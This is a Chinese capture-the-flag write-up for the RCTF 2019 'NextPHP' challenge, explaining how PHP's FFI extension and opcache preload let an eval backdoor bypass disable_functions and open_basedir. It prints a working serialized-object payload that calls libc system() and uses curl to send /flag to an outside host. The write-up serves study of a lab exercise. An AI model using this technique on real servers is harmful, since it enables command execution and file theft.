[RCTF 2019]NextPHP

题目代码很简单，看着很像白给的(最后惨遭打脸)，直接执行system函数发现被ban了，遂查看phpinfo。

if (isset($_GET['a'])) {    eval($_GET['a']);} else {    show_source(__FILE__);}

disable_functions内容如下

执行命令的函数被ban了很多，考虑读文件，发现目录被限制。
Warning: file_get_contents(): open_basedir restriction in effect. File(/etc/passwd) is not within the allowed path(s): (/var/www/html) in /var/www/html/index.php(3) : eval()'d code on line 1
尝试读取当前目录
var_dump(scandir(“/var/www/html”));
可以得到preload.php，尝试获取该文件的源码。

final class A implements Serializable {    protected $data = [        'ret' => null,        'func' => 'print_r',        'arg' => '1'    ];    private function run () {        $this->data['ret'] = $this->data['func']($this->data['arg']);    }    public function __serialize(): array {        return $this->data;    }    public function __unserialize(array $data) {        array_merge($this->data, $data);        $this->run();    }    public function serialize (): string {        return serialize($this->data);    }    public function unserialize($payload) {        $this->data = unserialize($payload);        $this->run();    }    public function __get ($key) {        return $this->data[$key];    }    public function __set ($key, $value) {        throw new \Exception('No implemented');    }    public function __construct () {        throw new \Exception('No implemented');    }}

得益于开启了preload预加载机制，preload.php中的内容都是全局的，因此index.php不需要include也可以使用。（当然你include也是可以的）
命令执行函数限制+目录限制，可以用FFI进行绕过。对于该机制，后续再进行详细的介绍。
使用的payload如下：

unserialize(base64_decode(%27QzoxOiJBIjo4OTp7YTozOntzOjM6InJldCI7TjtzOjQ6ImZ1bmMiO3M6OToiRkZJOjpjZGVmIjtzOjM6ImFyZyI7czoyNjoiaW50IHN5c3RlbShjaGFyICpjb21tYW5kKTsiO319%27))->__serialize()[%27ret%27]->system(%27curl%20-d%20@/flag%20Http://5f23b31a-ca67-481e-92b2-6db76aacaf98.node4.buuoj.cn:81%27);

FFI机制介绍

FFI是PHP7.4开始有的一个新特性，FFI提供了高级语言直接的互相调用，而对于PHP来说，FFI让我们可以方便的调用C语言写的各种库。
在本题中为了绕过PHP本身的disable_function，调用了c语言中的system函数。
调用外部高级语言的库需要提供libc文件，一般是so格式。只有被预加载的文件才能使用FFI拓展，因此直接尝试在普通文件中调用其他语言的函数是不可行的，比如本题目中的index。
对于是否支持FFI，可以查看phpinfo，看有没有FFI support = enabled。
当然，如果FFI直接=true而不是preload，WEB端，比如index，也可以执行FFI。
使用方法：
我们使用FFI::cdef()函数声明我们要调用的这个库中的函数以及使用到的数据类型。
用法举例：

// create FFI object, loading libc and exporting function printf()$ffi = FFI::cdef(    "int printf(const char *fORMat, ...);", // this is regular C declaration    "libc.so.6");// call C printf()$ffi->printf("Hello %s!\n", "world");

preload机制介绍

opcache.preload是PHP7.4中新加入的功能。如果设置了opcache.preload ，那么在所有Web应用程序运行之前，服务会先将设定的preload文件加载进内存中，使这些preload文件中的内容对之后的请求均可用。更多细节可以阅读：https://wiki.php.net/rfc/preload。只有被预加载的文件才能使用FFI拓展，但是FFI一般不开启，因为FFI拓展是一个非常危险的拓展。

来源地址：https://blog.csdn.net/blue_lotus_first/article/details/126979523